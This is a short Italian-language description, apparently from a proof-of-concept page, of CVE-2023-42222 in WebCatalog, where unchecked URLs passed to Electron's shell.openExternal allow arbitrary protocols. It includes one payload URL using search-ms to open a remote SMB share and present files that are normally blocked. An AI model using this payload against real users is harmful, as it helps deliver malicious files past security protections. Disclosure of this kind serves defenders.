
Proof-of-concept exploit per CVE-2023-42222 in WebCatalog, che dimostra l'esecuzione arbitraria di URL tramite `shell.openExternal` di Electron per bypassare le protezioni di sicurezza ed eseguire codice.
WebCatalog precedente alla versione 48.4.0 chiama la funzione Electron shell.openExternal senza verificare se l'URL è per una risorsa http o https, in alcune circostanze. Questa vulnerabilità consente a un attaccante di eseguire codice sulla macchina della vittima inviando messaggi contenenti link con protocolli arbitrari. La vittima deve interagire con il link e vede l'URL che viene aperto.


La vulnerabilità può essere confermata sincronizzando una pagina che permette URL arbitrari. Se viene sincronizzato un sito web che contiene search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools, viene creata una connessione SMB esterna. Questo può quindi essere utilizzato per bypassare le protezioni di sicurezza sulla macchina locale e presentare file dannosi all'utente, che di solito sarebbero bloccati.